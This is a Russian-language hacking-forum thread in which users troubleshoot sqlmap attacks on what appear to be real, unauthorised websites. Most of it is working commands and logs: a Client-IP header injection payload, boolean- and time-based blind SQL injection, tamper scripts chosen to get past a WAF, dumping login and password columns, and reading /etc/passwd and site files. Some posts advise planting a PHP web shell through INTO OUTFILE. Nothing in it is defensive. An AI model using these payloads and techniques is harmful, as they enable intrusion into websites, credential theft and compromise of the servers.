Не прокатило

Sensoft
28.05.2018, 01:43
BabaDook said:
↑ (https://antichat.live/posts/4213074/)
--headers='client-ip:*'


Ноооооооооооо


Code:
sqlmap -u site.ru --headers="Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='" --dump --random-agent

Так что то пошло


Code:
[00:41:28] [INFO] (custom) HEADER parameter 'Client-IP #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable

BabaDook
28.05.2018, 01:53
Sensoft said:
↑ (https://antichat.live/posts/4213077/)

Code:
sqlmap -u https://sote.io/ --headers='client-ip:*' --dump --random-agent

Не прокатило


возможно из за --headers='client-ip:*' отсутствие пробела . Возможно так надо было --headers='client-ip: *', вообще должно было. Но не суть, так или иначе всё робит. раскрутил же

Sensoft
28.05.2018, 01:58
BabaDook said:
↑ (https://antichat.live/posts/4213081/)
возможно из за --headers='client-ip:*' отсутствие пробела . Возможно так надо было --headers='client-ip: *', вообще должно было. Но не суть, так или иначе всё робит. раскрутил же


Почти сдвиг есть в хорошую сторону

там кажись waf (

Ошибки есть пока что крутит BD


Code:
[00:41:56] [INFO] checking if the injection point on (custom) HEADER parameter 'Client-IP #1*' is a false positive
[00:42:26] [WARNING] there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests
(custom) HEADER parameter 'Client-IP #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: -1' OR 3 AND SLEEP(5)-- TZaC21=6 AND 000358=000358 or 'tPXGszqn'='
---
[00:43:36] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[00:43:36] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [00:43:36] [INFO] fetching current database
[00:43:36] [INFO] retrieved:
[00:43:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prev nt potential disruptions
[00:46:21] [ERROR] invalid character detected. retrying..
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue with further
arget testing? [y/N]

спасибо тебе, чётко помог.

Sensoft
01.06.2018, 02:50
SQLmap не может спалить дыру


Code:
POST /dologin HTTP/1.1
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
Referer: https://site
Cookie: __cfduid=d5b944bc8a46493b7f7457c33594555a215278037 16; PHPSESSID=tcbac2uoac16f1rog3anmocn46
Host: site
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

email=%5c&password=g00dPa%24%24w0rD

я так понимаю всё и за %5c \с ней тоже дырка появляется

если убрать дырка исчезает

кто сталкивался ?

BabaDook
01.06.2018, 04:08
Может КФ не дает? мало данных подробней надо

Sensoft
01.06.2018, 04:14
BabaDook said:
↑ (https://antichat.live/posts/4214310/)
Может КФ не дает? мало данных подробней надо


лс чекни

RWD
01.06.2018, 18:51
Sensoft said:
↑ (https://antichat.live/posts/4214309/)
SQLmap не может спалить дыру

Code:
POST /dologin HTTP/1.1
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
Referer: https://site
Cookie: __cfduid=d5b944bc8a46493b7f7457c33594555a215278037 16; PHPSESSID=tcbac2uoac16f1rog3anmocn46
Host: site
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

email=%5c&password=g00dPa%24%24w0rD

я так понимаю всё и за %5c
\
с ней тоже дырка появляется
если убрать дырка исчезает
кто сталкивался ?


Было не раз такое.

Похоже что это не скуля, а просто ошибка.

Sensoft
01.06.2018, 18:56
RWD said:
↑ (https://antichat.live/posts/4214465/)
Было не раз такое.
Похоже что это не скуля, а просто ошибка.


не не это скуля

я иногда такие раскручивал но ща не получается

и там по ошибке ясно что скуля

PoliGroS
04.06.2018, 00:39
Здравствуйте, есть сайт с sqj inject site.com/trata=0 or updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--.

Как мне его скормить эту уязвимость sqlmaпу что б я уже с ней мог в нем работать, вывод таблиц, парсинг информации и тд. Спасибо

GoodBoy
07.06.2018, 18:27
Доброго времени суток. Решил пробежать один сайт при помощи sqlmap --crawl.

Он нашел один параметр и начал крутить, но неудачно.

.SpoilerTarget" type="button">Spoiler
http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category
Есть ли тут sql?

BabaDook
07.06.2018, 18:41
GoodBoy said:
↑ (https://antichat.live/posts/4216162/)
Доброго времени суток. Решил пробежать один сайт при помощи sqlmap --crawl.
Он нашел один параметр и начал крутить, но неудачно.
Spoiler
http://site.com/index.php?Itemid=41
+AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category
Есть ли тут sql?


Да есть.

GoodBoy
07.06.2018, 18:59
BabaDook said:
↑ (https://antichat.live/posts/4216170/)
Да есть.


Спасибо за ответ. Не составит ли вам труда показать пример запроса под этот случай? И как вы определили, что тут присутствует инъекция?

BabaDook
07.06.2018, 19:03
GoodBoy said:
↑ (https://antichat.live/posts/4216162/)
Доброго времени суток. Решил пробежать один сайт при помощи sqlmap --crawl.
Он нашел один параметр и начал крутить, но неудачно.
Spoiler
http://site.com/index.php?Itemid=41
+AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category
Есть ли тут sql?


Нет проблем:

Он нашел один параметр и начал крутить.

Запрос:


HTML:
http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category

Это Blind Boolean Based вектор

GoodBoy
07.06.2018, 19:12
BabaDook said:
↑ (https://antichat.live/posts/4216178/)
Нет проблем:
Он нашел один параметр и начал крутить.
Запрос:

HTML:
http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category

Это Blind Boolean Based вектор


А как задать это в sqlmap, тут уязвимый параметр itemid или id? Что писать в --data?

BabaDook
07.06.2018, 19:14
GoodBoy said:
↑ (https://antichat.live/posts/4216184/)
А как задать это в sqlmap, тут уязвимый параметр itemid или id? Что писать в --data?


sqlmap -u 'http://site.com/index.php?Itemid= (http://site.com/index.php?Itemid=41)41&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category' -p Itemid

Itemid.

Не надо ничего в --data

GoodBoy
08.06.2018, 18:05
Как с этим бороться: "unable to retrieve the number of database"?

--no-cast --hex не помогает

GoodBoy
10.06.2018, 00:52
Может ли SQLMap выдавать ложные payload-ы для инъекций? (Не определяется даже тип БД, хотя SQLMap сказал, что параметр уязвим) Или это WAF мешает?

BabaDook
10.06.2018, 03:38
ms13 said:
↑ (https://antichat.live/posts/4216804/)
Правда, БабаДук, упал навзничь раз, а раз на костяшки... и нифига не смешно!(


Да ничё, бывает, падать тоже хорошо, когда умеешь. ТЫ серт всё таки возьми, пускай скан пришлют

BabaDook
10.06.2018, 03:48
ms13 said:
↑ (https://antichat.live/posts/4216809/)
Какой ещё скан?
Сорян, прост я туплю дец... не понял...
PS: всё потрём позже..


Майку и серт, серт бери. Аваст блеааа

erwerr2321
10.06.2018, 03:59
BabaDook said:
↑ (https://antichat.live/posts/4216810/)
Майку и серт, серт бери. Аваст блеааа


да нах, это всё сурковская пропаганда...

Kevin Shindel
10.06.2018, 23:18
Ребят тут есть что то интересное?


Code:
3306/tcp open mysql MySQL (unauthorized)

Как расковырять?

karkajoi
12.06.2018, 10:58
Kevin Shindel said:
↑ (https://antichat.live/posts/4217019/)
Ребят тут есть что то интересное?

Code:
3306/tcp open mysql MySQL (unauthorized)

Как расковырять?


Ничего

RWD
12.06.2018, 18:00
Kevin Shindel said:
↑ (https://antichat.live/posts/4217019/)
Ребят тут есть что то интересное?

Code:
3306/tcp open mysql MySQL (unauthorized)

Как расковырять?


Если открыт доступ из вне и есть данные для входа в бд.

Искать на сайте sql injectuion и надеяться что там пользователь с правами.

Kevin Shindel
12.06.2018, 18:12
RWD said:
↑ (https://antichat.live/posts/4217452/)
Если открыт доступ из вне и есть данные для входа в бд.
Искать на сайте sql injectuion и надеяться что там пользователь с правами.


На сайте затычка от прова...

karkajoi
13.06.2018, 19:20
Вопрос, как выводить пароли по списку логинов ?

foozzione
17.06.2018, 11:13
есть post реквест с данными по типу - action=edit&data={"ItemID":""}, как крутить мапом?

сделал так:

action=edit&data={"ItemID":"1*"}, он правильно подставляет тесты в зачение itemid, сайт сам же выдает ошибку:


Code:
exec - Error in SQL:

Ну и собственно ниже бэктрейс с ошибкой синтаксиса, как в этом случае раскрутить ?

GoodBoy
27.06.2018, 22:27
Использую тор, и столкнулся с тем, что при boolean-based blind sql получение данных идет некорректно, как настроить задержку/исправить это? Насколько я понимаю - причина в скорости.

karkajoi
04.07.2018, 22:02
Чем можно дэкодировать юникод который достает мапа?

Sensoft
05.07.2018, 08:58
Хочу вытащить хеш от phpmyadmin но не достаточно прав через sqlmap.

Есть пути обхода ?


Code:
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)

Sensoft
05.07.2018, 14:47
И как можно ускорить дамп ? скуля слепая увеличение потоков не очень помогает, сервер на сайте хороший


Code:
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)

Bobrenz
09.07.2018, 00:50
уважаемые, есть вопрос, насколько адекватно sqlmap раскручивает и вообще крутит ли уязвимости asp,aspx, html

пытался по стандартному методу -u --dbs ,но ни одной так и не удалось раскрутить, мб кто с этим вопросом уже морочился, подскажите, плиз

Bobrenz
09.07.2018, 01:09
BabaDook said:
↑ (https://antichat.live/posts/4225200/)
Html точно не раскрутит. Только руками


а что по поводу asp? достаточно большое кол-во уязвимостей находит

mardoksp
10.07.2018, 11:57
Добрый день.

Помогите, пожалуйста, раскрутить.

Нашел уязвимость, получил список бд, пользователь не DBA. Получил хэши, запустил на скан на сайте onlinehashcrack.com (http://onlinehashcrack.com)

Как раскрутить дальше, чтобы залить php shell? (os-shell не отрабатывает)

Как можно через sql-shell получить список файлов/директорий?

dmax0fw
10.07.2018, 12:17
mardoksp said:
↑ (https://antichat.live/posts/4225536/)
Как раскрутить дальше, чтобы залить php shell? (os-shell не отрабатывает)


во первых попробовать через админку, возможно там будет функционал по заливке файлов, тут всё зависит от движка

во вторых попробовать залить через into outfile тестовый файл в /tmp/ и затем прочитать его через load_file, если отработает - искать полный путь до директории где лежит сайт и в ней искать директорию доступную на запись, затем можно заливать


mardoksp said:
↑ (https://antichat.live/posts/4225536/)
Как можно через sql-shell получить список файлов/директорий?


никак. если только ОС не FreeBSD

mardoksp
10.07.2018, 12:56
dmax0fw said:
↑ (https://antichat.live/posts/4225544/)
во первых попробовать через админку, возможно там будет функционал по заливке файлов, тут всё зависит от движка


вход на админку закрыт через http basic authentication apache, надо брутать пароли


dmax0fw said:
↑ (https://antichat.live/posts/4225544/)
во вторых попробовать залить через into outfile тестовый файл в /tmp/ и затем прочитать его через load_file, если отработает - искать полный путь до директории где лежит сайт и в ней искать директорию доступную на запись, затем можно заливать


уже пробовал, ошибка execution of non-query SQL statements is only available when stacked queries are supported

Думал загрузить через load_file .htpasswd, чтобы побрутать, но не получается.

Например, не могу понять почему


Code:
sqlmap -u "url/file.php?term=inf&item_id=123" --sql-query="select load_file('/home/site/www/info.php') from mysql.user" --no-cast

выдает


select load_file('/home/site/www/info.php') from mysql.user: ''


а вот


Code:
sqlmap -u "url/file.php?term=inf&item_id=123" --sql-query="select load_file('/home/site/www/index.php') from mysql.user" --no-cast



[04:55:26] [WARNING] reflective value(s) found and filtering out
[04:55:27] [INFO] retrieved:
select load_file('/home/site/www/index.php') from mysql.user: None

dmax0fw
10.07.2018, 13:12
mardoksp said:
↑ (https://antichat.live/posts/4225551/)
execution of non-query SQL statements is only available when stacked queries are supported


а причём тут stacked queries вообще

into outfile и load_file должны работать и без них

вообще для чтения и записи у sqlmap есть стандартные флаги: --file-read, --file-write, --file-dest. попробуй с ними поиграться


mardoksp said:
↑ (https://antichat.live/posts/4225551/)
Например, не могу понять почему


возможно такое что на index.php стоят права 600 и владелец какой-нибудь апач а ты пытаешся прочитать его от пользователя mysql

mardoksp
10.07.2018, 13:57
dmax0fw said:
↑ (https://antichat.live/posts/4225559/)
а причём тут stacked queries вообще
into outfile и load_file должны работать и без них


load работает, но into может не работать, если mysql запущен --secure-file-priv

mardoksp
13.07.2018, 02:18
разобрался с этим сайтом

Теперь вопрос про другой сайт. Нашел дыру (на битриксе).

Но не могу прочитать файлы, т.е. как обычно делаю --file-read='/etc/passwd', но выдает ошибку

Похожа ошибка была на другом сайте, она появлялась тогда, когда файл отсутствовал по указанному пути

.SpoilerTarget" type="button">Spoiler: Log


Code:
[17:30:10] [INFO] resuming back-end DBMS 'mysql'
[17:30:10] [INFO] testing connection to the target URL
[17:30:12] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: SECTION_ID (GET)
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ID=1) OR (SELECT 9559 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(9559=9559,1))),0x716b6a6271,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SAhe
---
[17:30:14] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[17:30:14] [INFO] fingerprinting the back-end DBMS operating system
[17:30:14] [INFO] the back-end DBMS operating system is Linux
[17:30:14] [INFO] fetching file: '/etc/passwd'
[17:30:14] [INFO] resumed:
[17:30:14] [WARNING] there was a problem decoding value ' ' from expected hexadecimal form
do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[17:30:21] [INFO] retrieved:
[17:30:21] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
/root/.sqlmap/output/site/files/_etc_passwd (size differs from remote file)

[17:30:21] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times


404 (Not Found) - 1 times ошибка выдается, скорее всего, по причине того, что при открытии страницы с sql-inject он отдает json но с HTTP CODE = 404

Теперь остается узнать какой параметр добавить, чтобы не было


[WARNING] there was a problem decoding value ' ' from expected hexadecimal form
/root/.sqlmap/output/site/files/_etc_passwd (size differs from remote file)


Ладно /etc/passwd может быть закрыт, но файлы битрикса хоть какие-то уже должен прочитать.

И в продолжении, в чем может быть причина, если это не отрабатывает


Code:
sqlmap -u site/inject.php?ID=1 -D database -T table_login -C LOGIN,PASSWORD --dump

И выдает ошибку


[WARNING] unable to retrieve the entries of columns 'LOGIN, PASSWORD' for table 'table_login' in database


А вот это отрабатывает


sqlmap -u site/inject.php?ID=1 --sql-query="select login from table_login where id=1"



.SpoilerTarget" type="button">Spoiler: Log2


Code:
[17:49:02] [INFO] resuming back-end DBMS 'mysql'
[17:49:02] [INFO] testing connection to the target URL
[17:49:04] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: SECTION_ID (GET)
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ID=1) OR (SELECT 9559 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(9559=9559,1))),0x716b6a6271,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SAhe
---
[17:49:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[17:49:06] [INFO] fetching SQL SELECT statement query output: 'select login from table_login where id=1'
[17:49:08] [INFO] used SQL query returns 1 entries
[17:49:09] [INFO] retrieved: admin
select login from table_login where id=1: 'admin'
[17:49:09] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times


Кодировка db - utf8

mardoksp
14.07.2018, 12:05
Найдена уязвимость


Code:
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/product&path=1&product_id=1 AND 7670=7670
Vector: AND [INFERENCE]

При попытке получить список баз данных вываливает ошибку

.SpoilerTarget" type="button">Spoiler: Log
[03:50:18] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.6.33, Nginx

back-end DBMS: MySQL 5 (MariaDB fork)

[03:50:18] [INFO] fetching database names

[03:50:18] [INFO] fetching number of databases

[03:50:18] [DEBUG] resuming configuration option 'string' (3D)

[03:50:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[03:50:18] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51

sqlmap got a 301 redirect to 'http://site/index.php?route=product/product&path=1&product_id=1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))'. Do you want to follow? [Y/n] n

[03:50:22] [WARNING] unexpected HTTP code '301' detected. Will use (extra) validation step in similar cases

[03:50:22] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48

[03:50:23] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9

[03:50:25] [INFO] retrieved:

[03:50:25] [DEBUG] performed 3 queries in 7.29 seconds

[03:50:25] [ERROR] unable to retrieve the number of databases

[03:50:25] [INFO] falling back to current database

[03:50:25] [INFO] fetching current database

[03:50:25] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>64

[03:50:27] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>32

[03:50:28] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>1

[03:50:30] [INFO] retrieved:

[03:50:30] [DEBUG] performed 3 queries in 4.97 seconds

[03:50:30] [CRITICAL] unable to retrieve the database names

Как дальше раскрутить? Спасибо

grimnir
17.07.2018, 11:15
mardoksp said:
↑ (https://antichat.live/posts/4226766/)
Найдена уязвимость

Code:
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/product&path=1&product_id=1 AND 7670=7670
Vector: AND [INFERENCE]

При попытке получить список баз данных вываливает ошибку
Spoiler: Log
[03:50:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.33, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[03:50:18] [INFO] fetching database names

[03:50:18] [INFO] fetching number of databases
[03:50:18] [DEBUG] resuming configuration option 'string' (3D)
[03:50:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:50:18] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51
sqlmap got a 301 redirect to '
http://site/index.php?route=product/product&path=1&product_id=1
AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))'. Do you want to follow? [Y/n] n
[03:50:22] [WARNING] unexpected HTTP code '301' detected. Will use (extra) validation step in similar cases
[03:50:22] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48

[03:50:23] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9
[03:50:25] [INFO] retrieved:
[03:50:25] [DEBUG] performed 3 queries in 7.29 seconds
[03:50:25] [ERROR] unable to retrieve the number of databases
[03:50:25] [INFO] falling back to current database

[03:50:25] [INFO] fetching current database
[03:50:25] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>64

[03:50:27] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>32

[03:50:28] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>1
[03:50:30] [INFO] retrieved:
[03:50:30] [DEBUG] performed 3 queries in 4.97 seconds
[03:50:30] [CRITICAL] unable to retrieve the database names
Как дальше раскрутить? Спасибо


1)нет прав

2)waf ответ 301 может или истекла сессия или поменялся ответ от сервера проверьте сайт не http может указывать нужно ,а https , после пробуйте --hex --no-cast ,тамперы и обход waf https://github.com/Ekultek/WhatWaf

3)поискать другую ошибку,где нет редиректа

mardoksp
17.07.2018, 21:01
grimnir said:
↑ (https://antichat.live/posts/4227509/)
обход waf
https://github.com/Ekultek/WhatWaf


пробую проверить, появляется ошибка

Не подскажите, как решить?

Sensoft
18.07.2018, 04:54
mardoksp said:
↑ (https://antichat.live/posts/4227637/)
пробую проверить, появляется ошибка
Не подскажите, как решить?


Ты кажись насувал дахуя тамперов

кстати количество вроде не решит для каждой защиты свои тамперы (но это не точно)

grimnir
18.07.2018, 14:49
mardoksp said:
↑ (https://antichat.live/posts/4227637/)
пробую проверить, появляется ошибка
Не подскажите, как решить?


вроде написано что слишком много редиректов.

mardoksp
18.07.2018, 16:39
Sensoft said:
↑ (https://antichat.live/posts/4227696/)
Ты кажись насувал дахуя тамперов
кстати количество вроде не решит для каждой защиты свои тамперы (но это не точно)




grimnir said:
↑ (https://antichat.live/posts/4227769/)
вроде написано что слишком много редиректов.


так я запустил по инструкции на гите, чтобы определило waf и указало какой тампер надо использовать.

И спустя стольких редиректов получаю ошибку. Я тампер в sqlmap вообще не использовал, думал WhatWaf подскажет что использовать

cat1vo
18.07.2018, 17:34
mardoksp said:
↑ (https://antichat.live/posts/4226766/)
Найдена уязвимость

Code:
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/product&path=1&product_id=1 AND 7670=7670
Vector: AND [INFERENCE]

При попытке получить список баз данных вываливает ошибку
Spoiler: Log
[03:50:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.33, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[03:50:18] [INFO] fetching database names

[03:50:18] [INFO] fetching number of databases
[03:50:18] [DEBUG] resuming configuration option 'string' (3D)
[03:50:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:50:18] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51
sqlmap got a 301 redirect to '
http://site/index.php?route=product/product&path=1&product_id=1
AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))'. Do you want to follow? [Y/n] n
[03:50:22] [WARNING] unexpected HTTP code '301' detected. Will use (extra) validation step in similar cases
[03:50:22] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48

[03:50:23] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9
[03:50:25] [INFO] retrieved:
[03:50:25] [DEBUG] performed 3 queries in 7.29 seconds
[03:50:25] [ERROR] unable to retrieve the number of databases
[03:50:25] [INFO] falling back to current database

[03:50:25] [INFO] fetching current database
[03:50:25] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>64

[03:50:27] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>32

[03:50:28] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>1
[03:50:30] [INFO] retrieved:
[03:50:30] [DEBUG] performed 3 queries in 4.97 seconds
[03:50:30] [CRITICAL] unable to retrieve the database names
Как дальше раскрутить? Спасибо




Code:
--tamper=greatest или --tamper=between или --tamper=least

Попробуйте один из этих. Судя по логам проблема в символе >, возможно так же и в [B]

mardoksp
18.07.2018, 18:36
[QUOTE="cat1vo"]
cat1vo said:
↑ (https://antichat.live/posts/4227813/)

Code:
--tamper=greatest или --tamper=between или --tamper=least

Попробуйте один из этих. Судя по логам проблема в символе
>
, возможно так же и в

, возможно так же и в
[B] обалдеть, сразу получил список баз

BabaDook
18.07.2018, 18:50
mardoksp said:
↑ (https://antichat.live/posts/4227825/)
--tamper=between
помог, но как вы узнали по логам? как обучиться такому кунг-фу?
обалдеть, сразу получил список баз


Практика и труд

mardoksp
18.07.2018, 19:23
кстати, а скорость можно увеличить, помимо кол-ва потоков (--threads 10) и так максимально стоит.

Уж очень долго получаю список таблиц. Боюсь данные буду получать несколько часов

mardoksp
19.07.2018, 11:36
простите за столь глупые вопросы

в итоге найдено


Code:
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/product&path=1&product_id=1 AND 9533=9533

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: route=product/product&path=1&product_id=1 OR SLEEP(10)

Пытаюсь получить файл.


Code:
sqlmap -u "https://site/index.php?route=product/product&path=1&product_id=1" -p product_id --file-read='/var/www/site/robots.txt' --time-sec 10 --tamper=between

Использую tamper=between

Пробую прочитать через --file-read

.SpoilerTarget" type="button">Spoiler: log
[03:13:37] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[03:13:37] [INFO] retrieved:

[03:13:45] [WARNING] reflective value(s) found and filtering out

[03:13:47] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)

[03:14:54] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[03:15:30] [WARNING] turning off pre-connect mechanism because of connection time out(s)

[03:16:32] [ERROR] invalid character detected. retrying..

[03:19:06] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[03:19:06] [INFO] fetched data logged to text files under '/root/.sqlmap/output/site'
Файл не сохраняется, если добавить --hex (--no-cast)

.SpoilerTarget" type="button">Spoiler: log --hex
[03:27:25] [INFO] retrieved:

[03:27:31] [WARNING] reflective value(s) found and filtering out

[03:27:52] [INFO] retrieved:

[03:27:52] [WARNING] there was a problem decoding value ' ' from expected hexadecimal form

do you want confirmation that the remote file '/var/www/site/robots.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n] y

[03:29:05] [INFO] retrieved:

[03:29:05] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)

files saved to [1]:

/root/.sqlmap/output/site/files/_var_www_site_robots.txt (size differs from remote file)

[03:29:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/site'
и сохраняется пустой файл.

Проблема в правах или что-то с преобразованием символом нужно шаманить? Есть ли вариант здесь раскрутить на чтение файлов?

grimnir
19.07.2018, 11:40
mardoksp said:
↑ (https://antichat.live/posts/4228097/)
простите за столь глупые вопросы
в итоге найдено

Code:
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/product&path=1&product_id=1 AND 9533=9533

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: route=product/product&path=1&product_id=1 OR SLEEP(10)

Пытаюсь получить файл.

Code:
sqlmap -u "https://site/index.php?route=product/product&path=1&product_id=1" -p product_id --file-read='/var/www/site/robots.txt' --time-sec 10 --tamper=between

Использую tamper=between
Пробую прочитать через --file-read
Spoiler: log
[03:13:37] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:13:37] [INFO] retrieved:
[03:13:45] [WARNING] reflective value(s) found and filtering out

[03:13:47] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)

[03:14:54] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[03:15:30] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[03:16:32] [ERROR] invalid character detected. retrying..
[03:19:06] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[03:19:06] [INFO] fetched data logged to text files under '/root/.sqlmap/output/site'
Файл не сохраняется, если добавить --hex (--no-cast)
Spoiler: log --hex
[03:27:25] [INFO] retrieved:
[03:27:31] [WARNING] reflective value(s) found and filtering out
[03:27:52] [INFO] retrieved:
[03:27:52] [WARNING] there was a problem decoding value ' ' from expected hexadecimal form
do you want confirmation that the remote file '/var/www/site/robots.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[03:29:05] [INFO] retrieved:
[03:29:05] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
/root/.sqlmap/output/site/files/_var_www_site_robots.txt (size differs from remote file)
[03:29:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/site'
и сохраняется пустой файл.
Проблема в правах или что-то с преобразованием символом нужно шаманить? Есть ли вариант здесь раскрутить на чтение файлов?


Привет, проверь права --is-dba если тру ,то дальше думать будем. И прочитать попробуй /etc/passwd

mardoksp
19.07.2018, 12:04
grimnir said:
↑ (https://antichat.live/posts/4228098/)
Привет, проверь права --is-dba если тру ,то дальше думать будем. И прочитать попробуй /etc/passwd


False, даже не могу прочитать хэш пароля.

/etc/passwd аналогично не читает.

